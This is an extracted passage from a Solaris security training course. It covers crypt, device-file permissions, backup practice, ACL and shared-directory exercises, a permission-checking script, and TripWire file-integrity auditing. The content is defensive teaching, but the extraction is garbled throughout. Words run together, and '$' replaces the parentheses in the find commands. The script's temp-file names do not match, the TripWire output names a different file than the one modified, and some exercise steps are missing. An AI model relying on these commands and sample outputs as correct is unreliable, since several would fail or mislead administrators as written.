If the key is not supplied, the crypt utility prompts for it. In this case, thekey is not echoed to the screen, making it difficult for an onlooker toobtain the key by shoulder surfing. Unfortunately, there is no keyconfirmation, so if you mistype the key you cannot decrypt the file.

Caution – If you use the C shell or Korn shell, supply the password tocrypt on the command line, then make sure your command history file isonly readable by you (that is, the permission mask is set to 600).

The crypt utility uses an encryption algorithm that is widely known and,as such, provides minimal security. The longer the key is, the moredifficult it is to break the code of the file. You can reduce the chances ofyour encrypted files being decrypted by encrypting the file multipletimes, using a different key at each stage, and by compressing the filesbefore encrypting them.

Caution – Take special care when decrypting files following the detectionof a break-in. A common intruder technique is to deliberately make thesystem administrator aware of a break-in, and then monitor theadministrator during attempts to decrypt files, thereby gaining thedecrypted passwords. Following a break-in, be very sure that you are notbeing monitored as you go through the decryption process.

Securing Device Files



The UNIX implementation of device files is one of the features that makesUNIX so flexible. Unfortunately, device files also present a security hazardwhen an intruder can access them in an unauthorized way.

For example, if intruders can write to the /dev/kmem file, they can alterprocess attributes or write garbage data in memory and crash the system.With access to raw disks, an intruder can read sensitive data or evenreplace or destroy important files.

All standard devices are located in the /devices directory, with symboliclinks to files in the /dev directory. A few devices, such as /dev/null andterminal devices, should be world-writable, but most of the rest shouldnot. Regularly check the permissions on the files in /devices andinvestigate any devices that are world-writable.



Unauthorized Device Files

Regularly check the entire file system for device files planted by intruders.A common method for attacking a system is to create a writable devicefile in a hidden directory. The ncheck command mentioned earlier (see“Identifying and Changing SUID and SGID Bits” on page 8-22) prints thename of all device files when run with the -s option. Alternatively, usethe find command to find all character and block special device files:

# find / $ -type c -o -type b $ -ls

Guidelines for Protecting Systems Using Backups



The importance of doing regular backups is repeated at virtually everylevel of system administration training, yet stories about the catastrophicloss of important data are still common. Even with the vast improvementin hardware reliability, it is impossible to over-emphasize the importanceof performing regular backups, and testing the restoration of the saveddata.

You should already know the mechanics of saving and restoring backupdata. However, with regard to the topic of system security, the subject isworth revisiting.

When faced with intruder break-ins or the possibility of sensitive databeing stolen, administrators should consider some of the finer points oftheir backup and restore procedures.



A good backup strategy usually involves a combination of full andincremental backups. When making adjustments to a strategy, use the fullbackup, because restoring a complete system is easier than restoring anincomplete one. Also, tape and other removable media is cheap comparedto the loss of data.

Some of the backup procedures to follow are:

● Use at least two or more complete sets of media for backups. If usingtape, retire a set of tapes after 50 cycles of use because of mediadegradation.

● Once a week, schedule a time to test your backups by restoringrandomly selected files. Choose files of varied sizes and positions onthe media to ensure that file size limitations or file boundaryproblems are not present in your existing backups.

● At least once a year, carry out a complete system restoration on aseparate machine, and examine its integrity. Knowing that theprescribed procedures work as intended will do wonders for yourconfidence level.

● When using tape media, occasionally restore selected files using adifferent tape drive. Alignment or speed differences could makeyour drive unique, rendering your tapes useless if that particulartape drive fails.

● Keep the backup media far away from the system being backed up.A local disaster, such as a small fire in one or two rooms, could meancomplete loss of data by destroying both the system and the backup.Do not store all the media in the same location.

● Write-protect every tape following a backup. It might be difficult toset the switch to writable again the next time you use the tape, butthis difficulty is better than accidentally overwriting a badly neededcomplete set of data just because of a tape mix-up.

● Some organizations, such as financial institutions, are required to beaudited for their ability to separate, manage, and restore backupdata. Pay close attention to these requirements. These requirementsusually complement or override any existing policy.



● Do a complete backup on systems that are installed for the first timeor have undergone a security cleanup. Day-zero backups are valuablewhen it comes to restoring files following a break-in. If it can bedetermined where a security problem existed in an initialinstallation, perform the full restoration, fix the problem, and thenback up the system again as your new day-zero backup version. Thisreduces the possibility of accidentally restoring an old, insecureversion of the file system in the future.

● Destroy or mark as unsafe all backups taken after there has been aknown or suspected break-in. Make a full backup immediately afterthe system has been cleaned.

● On a monthly, quarterly, or strategic schedule, test the restoration ofa complete set of tapes, and move them off-site to a safe place such asa safe-deposit box. For very sensitive data, it might be necessary tonotify company officers of the location and date of the media, in casethe system administrator is not available. If the place of storage isnot a formal safe-deposit box, make sure that the container isfireproof, waterproof, and free from exposure to excessiveelectromagnetic radiation.

● If you are concerned that sensitive data might be stolen, be aware ofwho is transporting the backup media to the off-site location, andensure that the media is kept under lock and key.

● When backing up very sensitive data, such as trade secrets or highlyvaluable source code, use encryption. Always use the sameencryption key and make it known to a trustworthy officer in case ofyour absence. Consider the use of a key-code-sharing scheme thatrequires retrieval of portions of the code from several people, so thatno single person can restore the files.

● Live backups (ones in multiuser mode where users are potentiallymaking changes to the system) give rise to issues with files thatchange during the backup. These files usually cannot be restored, orcan be invalid when restored. Try to schedule backups when usersare less likely to be modifying data. If possible, perform backups forarchive from single-user mode (or even better, booted fromCD-ROM).

Note – Solaris 8 OE includes a new utility fssnap which allowsadministrators to take a point-in-time snapshot of a UFS file system. Thefssnap command enables the user to keep the file system mounted andthe system in multiuser mode during backups.



● Set aside special file systems for very important and constantlychanging files, and back them up separately and more often than therest of the system.

The key aspects of this long list are:

● Keep backup media secure at all times.

● Do not allow unauthorized access to backup media or drives.

● Verify backups and do regular restorations as part of your media andprocedure checks.

● Destroy compromised backups after a break-in.

Remember, backups can be a weak point in your system’s security.



Restoring Data

Backing up is only half the equation. When a full or partial restoration ofdata is required, be aware of the following potential security implications:

● If a system has been attacked and subsequently cleaned, carelessrestoration of old files might restore the security problems and undoall your good work.

● If a system has been hardened (see Module 14), take a backup at thatpoint and, if possible, destroy all previous backups.

● Take care that no files belonging to deleted users are restored.

● Never restore over the original files, only restore to a separatelocation. Delete the existing files and move the required restored filesto their final location after the validity of the restoration has beenestablished.

These points might seem extreme, but implementing them helps toprotect your data in the event of a break-in or physical disaster.

Exercise: Securing File Systems




● Set up an ACL to share files

● Set up a group-shared directory

● Write a shell script that checks for lax file permissions

Preparation


Tasks


Task – Creating ACLs

Create an Access Control List for a file and test it as follows:

1. Create a file (in any manner you want) and set the standard UNIXpermissions to read–write for the owner only. Make sure you createthe file on a UFS file system such as in a user’s home directory. Donot use the /tmp directory because this is usually a swapfs filesystem and does not support ACLs.

2. Using an ACL, give read–write access to user alice , and read-onlyaccess to user bob .

3. Log in as users alice , bob , and eve , and check that:

a. The user alice can read and write to the file.

b. The user bob can read but not write to the file.

c. The user eve cannot read or write to the file.



4. Remove alice ’s write permission and delete bob from the ACLentry.

5. Check that:

a. The user alice can read and not write to the file.

b. The users bob and eve cannot read or write to the file.

Task – Creating a Group-Shared Directory

Use group permissions to create a shared directory as follows:

1. Create separate groups for each of the two users alice and bob .

2. Set the group name to be the same as the user name.

3. Create a third group called admin if this does not already exist.

4. Change alice so that alice ’s primary group is alice and alsoplace alice in the admin group. Also change bob to have a primarygroup of bob and a secondary group of admin .

5. Ensure both users have a umask setting of 027 (either set thismanually or ensure it is in /etc/profile or another suitable loginprofile file).

6. As user alice , create a shared directory called work in alice ’shome directory. Ensure this directory can be shared by members ofthe admin group but do not yet set the SGID bit for this directory.

7. As alice , create a file in this directory and as bob create another filein the directory. Can alice read all files in the shared directory?Can bob read all files?

8. Set the SGID bit for this directory and get alice and bob to createtwo more files. Can both users read these files?

9. As bob , try to delete the first file alice created. Did this work?

10. As alice , set the sticky bit on the directory and as bob try to deletethe second file alice created. Did this work?

11. Can alice delete all the files in the work directory, including thoseowned by bob?



Task – Creating File System Hardening Checklist

Create a shell script that checks for file system permission violations orother file system security holes. Include any checks that you feel areimportant.

Exercise Summary


Exercise Summary

?!


● Experiences

● Interpretations

● Conclusions

● Applications

Exercise Solutions


Exercise Solutions

The following tasks ask you to exercise the knowledge of access controllists and file or directory permissions that you gained in this module.

Creating ACLs

Create a file (in any manner you want) and set the standard UNIXpermissions to read–write for the owner only. Make sure you create thefile on a UFS file system such as in a user’s home directory. Do not use the/tmp directory because this is usually a swapfs file system and does notsupport ACLs.

1. The code below shows the acl_file before an ACL entry has beencreated.

$ echo "a small file" > acl_file$ chmod 600 acl_file$ ls -l acl_file-rw------- 1 groucho other 13 May 8 14:24 acl_file$ getfacl acl_file# file: acl_file# owner: groucho# group: otheruser::rw-group::--- #effective:---mask:---other:---

2. Use the setfacl -m command to create ACL entries for the file(do not forget to set the mask bits):

$ setfacl -m user:alice:rw-,user:bob:r--,mask:rw- acl_fileor$ setfacl -r -m user:alice:rw-,user:bob:r-- acl_file$ ls -l acl_file$ -rw-------+ 1 groucho other 13 May 8 14:35 acl_file$ getfacl acl_file# file: acl_file# owner: groucho# group: otheruser::rw-user:alice:rw- #effective:rw-user:bob:r-- #effective:r--group::--- #effective:---mask:rw-

Exercise Solutions


other:---4. Use the setfacl -m command to modify the ACL for alice :

$ setfacl -m user:alice:r-- acl_file

$ getfacl acl_file# file: acl_file# owner: groucho# group: otheruser::rw-user:alice:r-- #effective:r--user:bob:r-- #effective:r--group::--- #effective:---mask:rw-other:---

a. Alternatively, change the mask so no one can write to the file:

$ setfacl -m mask:r-- acl_file$ getfacl acl_file# file: acl_file# owner: groucho# group: otheruser::rw-user:alice:rw- #effective:r--user:bob:r-- #effective:r--group::--- #effective:---mask:r--other:---

b. Use the setfacl -d command to remove the ACL entry forbob :

$ setfacl -d user:bob acl_file$ getfacl acl_file# file: acl_file# owner: groucho# group: otheruser::rw-user:alice:r-- #effective:r--group::--- #effective:---mask:rw-other:---

c. Alternatively, use the setfacl -m command to remove bob’sread permissions:

$ setfacl -m user:bob:--- acl_file$ getfacl acl_file# file: acl_file# owner: groucho

Exercise Solutions


# group: otheruser::rw-user:alice:r-- #effective:r--user:bob:--- #effective:---group::--- #effective:---mask:rw-other:---

d. Or remove bob’s permissions with:

$ setfacl -d bob acl_file$ getfacl acl_file# file: acl_file# owner: groucho# group: otheruser::rw-user:alice:r-- #effective:r--group::--- #effective:---mask:rw-other:---

Creating a Group-Shared Directory

1. Create separate groups for each of the two users alice and bob .

2. Set the group name to be the same as the user name.

3. Create a third group called admin if this does not already exist.

4. Change alice so that the primary group is alice and the user is inthe admin group. Also change bob to have a primary group of boband a secondary group of admin .

# groupadd alice# groupadd bob# groupadd admin# usermod -g alice -G admin alice# usermod -g bob -G admin bob

5. Ensure that both users have a umask setting of 027 (either set thismanually or ensure it is in the /etc/profile file or another suitablelogin profile file).

alice$ umask 027

bob$ umask 027

Exercise Solutions


6. As user alice , create a shared directory called work in alice ’shome directory. Ensure that this directory can be shared by membersof the admin group but do not yet set the set-group-id bit for thisdirectory.

alice$ mkdir workalice$ chgrp admin workalice$ chmod g+w work

7. As alice , create a file in this directory and as bob try to createanother file in the directory.

alice$ touch work/alice1

bob$ touch ~alice/work/bob1

alice$ ls -ld work work/*drwxrwx--- 2 alice admin 512 Jul 5 16:57 work-rw-r----- 1 alice alice 0 Jul 5 16:57 work/alice1-rw-r----- 1 bob bob 0 Jul 5 16:57 work/bob1

Can alice read all files in the shared directory?

No, alice cannot read bob’s file because bob is not the owner or inthe file’s group.

Can bob read all files?

No, bob cannot read alice’s file because alice is not the owner or in thefile’s group.

8. Set the set-group-id bit for this directory and get alice and bob tocreate two more files.

alice$ chmod g+s workalice$ touch work/alice2

bob$ touch ~alice/work/bob2

alice$ ls -ld work work/*drwxrws--- 2 alice admin 512 Jul 5 17:03 work-rw-r----- 1 alice alice 0 Jul 5 16:57 work/alice1-rw-r----- 1 alice admin 0 Jul 5 17:03 work/alice2-rw-r----- 1 bob bob 0 Jul 5 16:57 work/bob1-rw-r----- 1 bob admin 0 Jul 5 17:03 work/bob2

Exercise Solutions


Can both users read these files?

Yes, both alice and bob can read the two new files because they arein the same group as the file.

9. As bob , try to delete the first file that alice created.

bob$ rm ~alice/work/alice1rm: /export.home/alice/work/alice1: override protection 640 (yes/no)? y

Did this work?

Yes it did because bob has write permission to the directory. The rmwarning was issued because bob does not have write permission to thefile, but this does not affect the ability to delete the file.

alice$ chmod +t workalice$ ls -ld work work/*drwxrws--T 2 alice admin 512 Jul 5 17:05 work-rw-r----- 1 alice admin 0 Jul 5 17:03 work/alice2-rw-r----- 1 bob bob 0 Jul 5 16:57 work/bob1-rw-r----- 1 bob admin 0 Jul 5 17:03 work/bob2

10. As alice , set the sticky bit on the directory and as bob try to deletethe second file alice created.

bob$ rm ~alice/work/alice2rm: /export.home/alice/work/alice1: override protection 640 (yes/no)? yrm: alice2 not removed: Permission denied

Did this work?

No, the sticky bit prevents bob from deleting files that bob does notown.

11. Can alice delete all the files in the work directory, including thoseowned by bob?

Yes alice can because alice owns the directory.

Exercise Solutions


Creating a File System Hardening Checklist

The following is an example script. You might have thought of extrachecks.

1 # find files in bin and system directories that are world-writable2 find /usr/sbin /usr/bin /etc /var -perm -o=w -type f -exec ls -l {}\;34 # find root owned files running SUID compare with valid list5 find / -perm -u=s -user root -type f -exec ls -l {} \; > /tmp/suid6 diff /tmp/suid /var/security/valid_suid_root78 # find any files running SUID or SGID and compare with valid list9 find / $ -perm -u=s -o -g=s $ -type f -exec ls -l {} \; > /tmp/gsid10 diff /tmp/sgid /var/security/valid_suid_sgid1112 # find any files not owned by a valid user13 find / -nouser -print1415 # find devices not in /devices directory16 find / -name devices -prune -o -name dev -prune -o -name proc -prune-o $ -type c -o -type b $ -print17


Module 9

Auditing File Systems

Objectives


● Describe the role of file system auditing

● Describe how file system auditing tools such as TripWire can secureyour system

● Describe the purpose of the Solaris OE Fingerprint Database

Relevance


Relevance

?!

Discussion – The Solaris OE contains many applications and importantsystem files. Can you:

● Be sure that files integral to the security of your system have not beentampered with?

● Quickly verify that your important files were left untouched after asystem break-in?


Auditing File Systems 9-3Copyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C



● Online manual pages for tripwire(8) and tw.config (5) .

● The Solaris OE Fingerprint Database[http://sunsolve.sun.com/pub-cgi/fileFingerprints.pl ]

● The Solaris OE md5program[http://sunsolve.sun.com/md5/md5.tar.Z ]

● The TripWire tool download site:[ftp://ftp.cerias.purdue.edu/pub/tools/unix/ids/tripwire/Tripwire-1.3.1-1.tar.gz ]

What Is Auditing?


What Is Auditing?

File system auditing is the process of monitoring the file system forchanges, and reporting those changes that are deemed important. A filesystem audit can look for any change to the file system, such as new ordeleted files, a change in file contents, or a change in a file time stamp.

What Is Auditing?


The results of a file system audit can determine:

● Whether a system break-in has occurred, due to the identification offile modifications made by intruders either trying to cover theirtracks or installing modified programs

● Whether system files have been tampered with, and whether thosefiles should now be investigated to determine if they can be trusted

● Which files have been modified after a successful system break-in

What Is Auditing?


Auditing Techniques

A file system auditing tool typically creates a database representing thecurrent state of the file system. At some later time, you run the tool againto compare the new state of the file system with the database recorded thefirst time that the tool was run. You can generate a report describing whathas changed. After recording and investigating any changes, the databaseshould be updated with those changes that have been acknowledged.

Auditing tools allow an administrator to specify which parts of the filesystem to monitor, and how to monitor them. There are many attributes ofa file system that can be monitored:

● New and deleted files

● File size

● File contents (using a checksum or signature)

● File owners (user and group)

● The file mode (permissions)

What Is Auditing?


● Time stamps (access, modification, and inode update)

● Inode number (showing that a file has been replaced)

When configured, most file system auditing tools can be automaticallyexecuted at regular intervals, and the report emailed to an administrator.However, some manual intervention is required to ensure that the audittool itself, the configuration files, or the database, have not been tamperedwith.

Another approach to file system auditing is the use of large databasescontaining file signatures (see “File Digest Algorithms” on page 9-11). Withthis approach, you use a program to obtain the signature of a file, andthen use this signature to query the database. A report is produced on thefile, describing whether it is contained in the database. For example, if thedatabase contains all known binary programs in all operating releasesfrom a certain vendor, then the report describes the operating systemversion and patch level of the file. These databases are extremely usefulwhen acquiring a system with an unknown history, because they allowyou to verify whether the files are from an original distribution.

What Is Auditing?


Using Audits to Detect Successful Security Attacks

There are several ways to use a file system auditing tool to detect asuccessful security attack. The following file system changes might bemade by an intruder on your system, and should be investigated:

● A file that should not change has changed (for example, /bin/loginhas changed due to an intruder installing a modified version)

● A new file has been added to a directory that should not generallychange (for example, an intruder has added a network sniffer to/usr/bin )

● A log file has shrunk (an intruder tried to cover their tracks byediting one of the many system logs)

● A new user has been added to the password file (this might not bedue to an intruder, but the system administrator should be aware ofit)

What Is Auditing?


File Digests and Checksums

File system auditing tools use checksums and file digest algorithms tomonitor a file for changes. These values are stored in the audit database,along with other attributes such as file size. There are advantages anddisadvantages to both checksums and file digest algorithms, therefore,most tools allow you to choose which to use.

What Is Auditing?


Checksum Algorithms

Checksums are small (16 or 32 bit) values and they are used primarily formonitoring files against casual or random modifications. A determinedintruder can modify a file and still keep the size and checksum unchanged.The algorithms, although insecure against a determined intruder, areextremely fast. CRC16 and CRC32 are examples of two modern checksumalgorithms.

The UNIX utility sum is a simple checksum algorithm, as shown inCode 9-1.

Code 9-1 Example Checksum Algorithm

# sum /usr/bin/ksh2940 393 /usr/bin/ksh

What Is Auditing?


File Digest Algorithms

File digest algorithms (sometimes called Message Digest Algorithms, orCryptographic One-Way Hash Functions) are extremely complexalgorithms developed by cryptographers. The file digests (or signatures)generated by these algorithms can be thought of as a small (often around16 or 20 bytes) representation of a file. Any change results in thecorresponding file digest changing as well. When using a good file digestalgorithm, an intruder cannot modify a file and leave the file digest valueunchanged.

The downside to the good security of file digest algorithms is that theycan be very slow compared to checksum algorithms. Message Digestversion 5 (MD5) and Secure Hash Algorithm (SHA) are two of the morepopular and trusted algorithms.

What Is Auditing?


An MD5 program is not supplied with Solaris OE but can be downloadedfrom the Web site shown in “Additional Resources” on page 9-3. Code 9-2shows an example MD5 algorithm

Code 9-2 Example MD5 Algorithm

# md5 /usr/bin/kshMD5 (/usr/bin/ksh) = 0c9979ee5d4aabf6f084b21bc6b46b8a

What Is Auditing?


The Solaris OE Fingerprint Database

The Solaris OE Fingerprint Database is a SunSolveSM service that enablesyou to verify the integrity of files distributed with the Solaris OE,Solaris OE patches, and unbundled products, such as SPARC™ compilers.

The Solaris OE Fingerprint Database can verify that a customer is using atrue file in an official binary distribution, and not a recompiled versionthat could compromise security, or at least cause support problems. Youmust enter a file’s MD5 signature to obtain a report on the file. The MD5program is required to generate the MD5 signature.

The MD5 program and the Solaris OE Fingerprint Database are availablefrom the SunSolve Web site (see “Additional Resources” on page 9-3 forthe URL).

What Is Auditing?


Example output for the MD5 signature from the /us/bin/ksh in Code 9-2on page 9-12 is shown in Figure 9-1.

Figure 9-1 Solaris Fingerprint Database

Using TripWire to Audit File Systems



TripWire is a freeware file system auditing tool that creates a database ofinformation about files on a file system. This database is later comparedwith the current file system to determine what has changed, whichprovides a way of determining which files have been modified. You canthen update the database with the new changes, after the changes havebeen investigated.



One way to use the TripWire tool is to initialize the database, store asecure copy offsite, and then use the TripWire tool from a cron job toregularly audit the file system. If there are changes, TripWire notifies youusing email.

When the TripWire tool reports a change to a file’s contents, it notifies youthat a change has occurred, but does not give information about what thechange is. You should completely reinstall corrupted files instead of tryingto fix them.

Note – The TripWire tool was developed by Eugene Stafford and GeneKim at Purdue University in 1992. TripWire was commercialized in 1998and is maintained by TripWire Security, Inc.

Obtaining the TripWire Tool

The TripWire tool can be obtained from the FTP site listed in “AdditionalResources” on page 9-3.



Editing the TripWire Configuration File

You must edit the tw.config default configuration file to fit therequirements of the system. This file is kept in the TripWire configurationdirectory which is determined when TripWire is built and installed. Bydefault this is /usr/local/bin/tw .

TripWire includes many default configurations for most popular UNIXplatforms in the configs subdirectory of the TripWire installationdirectory. Typically, you copy a standard configuration to your tw.configfile and remove all directories and files that are of no interest and add anyadditional files and directories that are important.

Each line in this file contains a file (or directory) path name and a string ofcharacters representing the attributes to monitor.



The characters in the tw.config indicate to TripWire which attributes tocheck. A full list of attributes is shown in Table 9-1.

Table 9-1 TripWire Attribute Characters

Attribute Meaning

p Permission and file mode bits

i Inode number

n Number of links (that is, the inode reference count)

u User ID of owner

g Group ID of owner

s Size of file

a Access time stamp

m Modification time stamp

c Inode creation or modification time stamp

0 Null signature

1 MD5, the RSA Data Security, Inc.® MessageDigesting Algorithm

2 Snefru , the Xerox Secure Hash Function

3 CRC-32, POSIX 1003.2 compliant 32-bit CyclicRedundancy Check

4 CRC-16, the standard (non-CCITT) 16-bit CyclicRedundancy Check

5 MD4, the RSA Data Security, Inc. Message DigestingAlgorithm

6 MD2, the RSA Data Security, Inc. Message DigestingAlgorithm

7 SHA, the NIST Secure Hash Algorithm(NIST FIPS 180)

8 Haval, a strong 128- bit signature algorithm

9 Null signature (reserved for future expansion)



If a character is prefixed with a + (for example, +pugs1m for /fred) ,those respective attributes are used when checking a file. Attributesprefixed with a - are not checked.



Configuration Templates

Using the character codes to specify the audit attributes for files anddirectories can be tedious and prone to error. The TripWire tool containstemplates that can import a set of attributes. Table 9-2 shows thetemplates that are defined.

By default, TripWire uses the R template, which ignores only the accesstime stamp.

Table 9-2 TripWire Configuration Templates

Template Description Attributes

R Read-only +pinugsm012-a3456789

L Log file +pinug-samc0123456789

> Growing log file +pinug-samc0123456789

N Nothing -pinugsamc0123456789

E Everything +pinugsamc0123456789



You can use the templates in a modified manner by appending additionalcharacters. For example, use the sequence L+c-p for a log file where inodecreation and modification time (c) should be monitored, but thepermissions (p) can be ignored.

The only difference between the log file template (L) and the growing log filetemplate (>), is that the growing log file template is the only template thatignores files that increase in size, by ignoring the > attribute. However, itstill checks that the file does not decrease in size.

A tw.config file is shown in Code 9-3.

Code 9-3 Simple TripWire Configuration

# more tw.config/etc/passwd +pugs1m-a/etc/shadow +pugs1m-a/usr/sbin +pugs1m-a/usr/bin +pugs1m-a/var/log/messages >

Go to the online manual page for tw.config (5) for information aboutadditional switches and templates where switches can be groupedtogether.

Generating a TripWire Database

You can create a new TripWire database by running TripWire with the-initialize argument. If you also provide the verbose flag (the -vargument), then each file name and directory appears as it is scanned, asshown in Code 9-4.

Code 9-4 Creating a New TripWire Database

# tripwire -initializeTripwire(tm) ASR (Academic Source Release) 1.3.1File Integrity Assessment Software(c) 1992, Purdue Research Foundation, (c) 1997, 1999 TripwireSecurity Systems, Inc. All Rights Reserved. Use Restricted toAuthorized Licensees.### Phase 1: Reading configuration file### Phase 2: Generating file list### Phase 3: Creating file information database###



### Warning: Database file placed in ./databases/tw.db_grommit.###### Make sure to move this file and the configuration### to secure media!###### (Tripwire expects to find it in '/var/tripwire'.)



Checking a TripWire Database

When you generate or initialize the database, you should archive itsecurely. The TripWire tool can check the integrity of the system bycomparing the archived database with the current system.

Copy the TripWire database Code 9-4 on page 9-21 to the default TripWiredatabase directory location (/var/tripwire in this example), and run theTripWire tool to determine if any files on the system have changed, asshown in Code 9-5.

Note – The name of the database file depends upon the hostname of thesystem. These examples use the hostname grommit , and the database fileis tw.db_grommit . You must modify the examples to suit your server;check the contents of the databases directory to determine what filename you should use.

Code 9-5 Running TripWire to Identify Changed Files

# cp databases/tw.db_grommit /var/tripwire



# tripwire### Phase 1: Reading configuration file### Phase 2: Generating file list### Phase 3: Creating file information database### Phase 4: Searching for inconsistencies###### All files match Tripwire database. Looks okay!###

This example indicates that no files were modified.

Identifying Inconsistencies

To show TripWire recognizing an inconsistency, modify one of the filesthat is being checked, and run TripWire again, as shown in Code 9-6.

Code 9-6 Running TripWire to Identify Inconsistencies

# touch /usr/bin/ksh# tripwire### Phase 1: Reading configuration file### Phase 2: Generating file list### Phase 3: Creating file information database### Phase 4: Searching for inconsistencies###### Total files scanned: 617### Files added: 0### Files deleted: 0### Files changed: 1###### Total file violations: 1###changed: -r-xr-xr-x root 795 Jul 6 12:28:28 2001 /usr/bin/clear### Phase 5: Generating observed/expected pairs for changed files###### Attr Observed (what it is) Expected (what it shouldbe)### =========== ======================================================/usr/bin/clear st_mtime: Fri Jul 6 12:28:28 2001 Thu Apr 26 17:56:50 2001 st_ctime: Fri Jul 6 12:28:28 2001 Thu Apr 26 17:56:50 2001



Updating the Database

You can update the database to accommodate sanctioned changes byrunning the TripWire tool in the update mode, as shown in Code 9-7,where directories or files can be specified.

Code 9-7 Running TripWire in the Update Mode

# tripwire -update /usr/bin/clearTripwire(tm) ASR (Academic Source Release) 1.3.1File Integrity Assessment Software(c) 1992, Purdue Research Foundation, (c) 1997, 1999 TripwireSecurity Systems, Inc. All Rights Reserved. Use Restricted toAuthorized Licensees.### Phase 1: Reading configuration file### Phase 2: Generating file listUpdating: update file: /usr/bin/clear### Phase 3: Updating file information database###### Old database file will be moved to tw.db_grommit.old'### in ./databases.###### Updated database will be stored in './databases/tw.db_grommit'### (Tripwire expects it to be moved to '/var/tripwire'.)###### Database cleanup started### Database cleanup finished# cp ./databases/tw.db_grommit /var/tripwire

Double-Checking Integrity

Copy the database to the default TripWire database directory location(/tmp in this example), and perform another integrity check to determineif the changes to the /fred directory are reported after a database update.

# cp databases/tw.db_grommit /tmp# tripwire### Phase 1: Reading configuration file### Phase 2: Generating file list### Phase 3: Creating file information database### Phase 4: Searching for inconsistencies###### All files match Tripwire database. Looks okay!###



For additional information about the TripWire tool, read the READMEfile inthe TripWire directory or the tripwire(8) and tw.config(5) manualpages.

Securing the TripWire Database



You should store TripWire databases in a secure manner. For example,use:

● Read-only media

● Removable media

● A trusted secure server

● A copy on a machine that is not connected to a network

The database must be secured in this way to ensure that TripWire reportsany changes made to the database (for example, an intruder mightperform a TripWire initialize operation after installing modified programs,to try to avoid changes being reported).



A typical approach to this problem is to store a copy of the TripWiredatabase offline (for example, on removable media). This copy canregularly overwrite the database stored on the file system. Alternatively,you can compare the secure offline database to the file system copy usingMD5 signatures.

This security is also required with the TripWire executables and thetw.config configuration file. Again, this is because the executables andconfiguration file could be modified by an intruder so that the file systemaudit does not report certain changes. However, you can easily rebuild theexecutables and the configuration file once in a while.

Exercise: Using the TripWire Tool




● Configure, compile, and install the TripWire tool

● Create and update a TripWire database for a set of files

● Generate some TripWire reports

● Modify one or more of the files that TripWire monitors to ensure thatthe changes are reported

Preparation

Ensure that you have installed the GNU C++ compiler and the makeutility.

Task – Installing TripWire

The TripWire download site is listed in “Additional Resources” onpage 9-3. A copy of the download file (swatch.tar ) is also in the/usr/local/pkg directory.

To install TripWire:

1. Extract the TripWire archive into a subdirectory under /usr/localand read the installation instructions.

2. Edit the makefile to use the install utility in the/usr/ucb/install directory. Search for the pattern ucb in the fileand uncomment this line and comment out the previous line. Thelines should now read:

#INSTALL= /usr/bin/install # commonINSTALL= /usr/ucb/install # Pyramid DC/OSx (SVR4)

3. Also edit the makefile to set the following parameters (defined atthe top of the file):

DESTDIR=/usr/local/binDATADIR=/var/tripwireMANDIR=/usr/local/man



4. Before installing TripWire you need two directories for the manualpages. If these directories do not exist, enter these commands.

# mkdir /usr/local/man/man5# mkdir /usr/local/man/man8

Note – If you install TripWire without first creating these directories, theinstallation process incorrectly creates plain files with these names andfails to install the manual pages. Remove the plain files with the rmcommand, create the directories as above, and install TripWire again.

5. Follow the instructions in the READMEfile in the TripWire directory toinstall TripWire. You must update the include/config.h file tomake sure that the installation and data directories match the valuesof the variables in the makefile . Set the appropriate lines in this fileto:

#define CONFIG_PATH "/usr/local/tripwire"#define DATABASE_PATH "/var/tripwire"

Task – Creating a TripWire Configuration

1. Configure the TripWire tool to generate a database for thesedirectories:

● /etc/passwd

● /etc/shadow

● /usr/bin

2. Select the following options for all checked files:

a. Check the user, group, permissions, and file size attributes.

b. Use file digest algorithm SHA signatures in addition to MD5.

c. Do not check the access time attributes.

3. You must rename the existing tw.config database file you createdwhen you installed TripWire, otherwise the TripWire file checkingprocess takes too long (about 45 minutes for the standardconfiguration).

4. Generate a database and use the verbose flag to make sure that thecorrect files and directories are being checked.



Task – Running System Integrity Checks

For this part of the exercise, you make changes to the system and runTripWire to detect those changes. Ask your instructor if you have anyquestions about the purpose of any of the tests or the outcome of theintegrity checks.

To run system integrity checks:

1. Perform an integrity check on the system. What changes werefound?

2. Change the comment field for the daemon entry in the /etc/passwdfile.

3. Perform an integrity check on the system. Did the TripWire toolreport the change?

4. Refer to the TripWire manual page and run the TripWire tool in quietmode. Record your results here.

Command: _______________________________

Results: _________________________________

5. Update the database to include the change to the /etc/passwd file.

6. Perform an integrity check on the database. Explain the results.

7. Refer to the tw.config manual page and determine which templateto use with the log files that are expected to grow.

8. Create a file called my-log .

9. Add an entry to your tw.config file calledconfigs/tw.check to monitor your my-log log file.

10. Add text to your log file.

11. Initialize your database.

12. Perform a quiet mode integrity check of the system. Record yourresults here and explain the results:

____________________________________________________



____________________________________________________



15. Remove some text from your log file.


____________________________________________________

17. Update the TripWire database.


____________________________________________________

19. Change text in your log file, taking care not to change the file size.


____________________________________________________

21. What conclusions can you draw from this result?

Exercise Summary


Exercise Summary

?!


● Experiences

● Interpretations

● Conclusions

● Applications

Exercise Solutions


Exercise Solutions

The following are the solutions to the tasks.

Installing TripWire

The TripWire download site is listed in “Additional Resources” onpage 9-3. A copy of the download file (Tripwire-1.3.1-1.tar ) is also inthe /usr/local/pkg directory.

To install TripWire:

1. Extract the TripWire archive into a subdirectory under /usr/localand read the installation instructions.

1 # cd /usr/local2 # tar xvf pkg/Tripwire-1.3.1-1.tar3 # cd tw_ASR_1.3.1_src4 # more README

2. Edit the ./include/config.h file as follows:

a. Change the location of the configuration and database filesfrom:

#define CONFIG_PATH "/usr/local/bin/tw"#define DATABASE_PATH "/var/tripwire"

to

#define CONFIG_PATH "/usr/local/tripwire"#define DATABASE_PATH "/var/tripwire"

b. Create a directory for the configuration file and copy the defaultconfiguration file to the new directory. (You will overwrite thisconfiguration later in this exercise.)

# mkdir -p /usr/local/tripwire /var/tripwire# cp configs/tw.conf.sunos5 /usr/local/tripwire/tw.config

The tw.config file contains a list of all files and directories that arechecked and verified by TripWire.

Exercise Solutions


c. Edit the makefile and use the install utility in/usr/ucb/install . Search for the pattern ucb in the file anduncomment this line and comment out the previous line. Thelines should now read:

#INSTALL= /usr/bin/install # commonINSTALL= /usr/ucb/install # Pyramid DC/OSx (SVR4)

3. Also edit the makefile to set the following parameters (defined atthe top of the file):

DESTDIR=/usr/local/binDATADIR=/var/tripwireMANDIR=/usr/local/man

4. Before installing TripWire you need two directories for the manualpages. If these directories do not exist, enter these commands:

# mkdir /usr/local/man/man5# mkdir /usr/local/man/man8

